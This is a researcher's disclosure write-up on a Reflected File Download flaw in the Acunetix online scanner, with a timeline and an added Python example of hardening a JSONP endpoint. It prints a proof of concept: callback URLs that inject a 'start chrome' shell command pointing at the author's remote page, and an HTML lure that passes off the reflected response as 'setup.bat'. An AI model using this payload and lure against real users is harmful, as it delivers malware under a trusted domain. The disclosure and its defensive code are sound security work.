After publishing a report on a piece of security software, OWASP ZAP, I found another vulnerability at a security company: Acunetix.
It reminds me of the proverbial saying:
The shoemaker's son always goes barefoot.
I found a way to trick users into downloading a batch [executable] file that comes from ovs.acunetix.com using a Reflected File Download (RFD) vulnerability.
It was funny how I found this one. I noticed that Acunetix allowed users to test for vulnerabilities online, and I was curious about that web application. I registered for a demo account and noticed lots of XHR requests in the Google Chrome inspector. So I decided to give RFD a try...
This security issue affected almost all XHR requests on ovs.acunetix.com, the Acunetix Online Vulnerability Scanner. Every request let a user inject a callback containing special characters, which is what made the attack possible.
Take this example:
https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start chrome davidsopas.com/poc/malware.htm||
Which reflects on the screen:
start chrome davidsopas.com/poc/malware.htm||({"message": "get:sgn:invalid size", "data": null, "error": "bad-input"});
It didn’t give any HTTP error:
Request URL: https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
Request Method: GET
Status Code: 200 OK
Remote Address: 54.209.55.15:443
So I was able to inject a callback, and even though the JSON body carried an error message, the server still answered with HTTP 200 rather than an error status.
Because I couldn't control the filename or force a download from the server side, I needed to use the HTML5 download attribute.
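The root cause above is a JSONP-style endpoint that reflects whatever is passed in the callback parameter, even on a bad request. The following is an added example, not Acunetix's code, of how such an endpoint can be hardened: the callback name is restricted to a JavaScript identifier path, a bad name produces a 400 instead of a 200 with the attacker's text in the body, and the response carries a nosniff header and a fixed Content-Disposition filename so the server, not the caller, decides the name and extension of anything saved to disk. The `jsonp_response` helper and the filename are assumptions standing in for whatever framework the real endpoint uses.

```python
import json
import re

# A JSONP callback should be nothing more than a JavaScript identifier path
# (for example "cb" or "jQuery_17.done"). Anything else is rejected, so shell
# text such as the "start chrome ...||" callback from the write-up can never
# reach the response body.
CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*")
MAX_CALLBACK_LEN = 64


def is_safe_callback(name):
    """True only for a short, well-formed JavaScript identifier path."""
    if not name or len(name) > MAX_CALLBACK_LEN:
        return False
    return CALLBACK_RE.fullmatch(name) is not None


def jsonp_response(callback, payload):
    """Build (status, headers, body) for a JSONP-style API reply.

    Hypothetical helper (assumption): it stands in for the real framework.
    Defences combined here:
      * the callback is validated; a bad one is a 400 with a fixed JSON body,
        never a 200 that reflects the caller's text;
      * X-Content-Type-Options: nosniff stops the browser from guessing a
        more dangerous type than the one declared;
      * a fixed Content-Disposition filename (assumed name) means that even if
        the response is saved, the name and extension are chosen server-side.
    """
    common = {
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'attachment; filename="api-response.txt"',
    }
    if not is_safe_callback(callback):
        headers = dict(common, **{"Content-Type": "application/json; charset=utf-8"})
        return 400, headers, json.dumps({"error": "bad-callback"})
    headers = dict(common, **{"Content-Type": "application/javascript; charset=utf-8"})
    # The leading /**/ is a common JSONP hardening step: the response can
    # never start with caller-controlled bytes.
    body = "/**/" + callback + "(" + json.dumps(payload) + ");"
    return 200, headers, body


if __name__ == "__main__":
    # Constructed inputs: a normal callback and the one from the write-up.
    for cb in ("cb", "start chrome davidsopas.com/poc/malware.htm||"):
        status, _, body = jsonp_response(cb, {"message": "ok", "data": None})
        print(status, body)
```

These endpoints were reached via XHR, so the attachment header costs nothing there; if an endpoint is genuinely loaded through script tags, check in the browsers you support that the attachment header does not interfere before rolling it out.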
[code language=”html”]
<div align="center">
<a href="https://ovs.acunetix.com/rpc/reports/count?sgn=1&amp;callback=start chrome davidsopas.com/poc/malware.htm||" download="setup.bat" onclick="return false;">
<img src="https://www.davidsopas.com/poc/Acunetix_1.jpg" border="0" />
</a>
<h1>Download Acunetix Web Security Scanner for Free!</h1>
<p><i>(Use "Save link as" to download the file)</i></p>
</div>
[/code]
As I said before, it happened in almost every XHR request:
https://ovs.acunetix.com/rpc/scans/count?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
https://ovs.acunetix.com/rpc/scans/list?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
https://ovs.acunetix.com/rpc/licenses/get?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
Possible attack scenario:
Because this file can be accessed without authentication, a malicious user could use this to attack any user.
- The malicious user creates a specially crafted page, similar to my proof-of-concept, promising to download Acunetix web security software.
- The victim clicks to download the file [even if the victim checks the source code of the page, they would see the trusted source: acunetix.com].
- The victim runs the file and gets hijacked.
The Acunetix security team fixed this vulnerability very fast, proving that they're on top of things. I wish I could see other companies follow Acunetix's patching timeline.
Timeline:
17-09-2015 Reported to Acunetix
17-09-2015 Acunetix acknowledged the vulnerability
18-09-2015 Acunetix informed me that they had fixed this security issue
22-09-2015 Full disclosure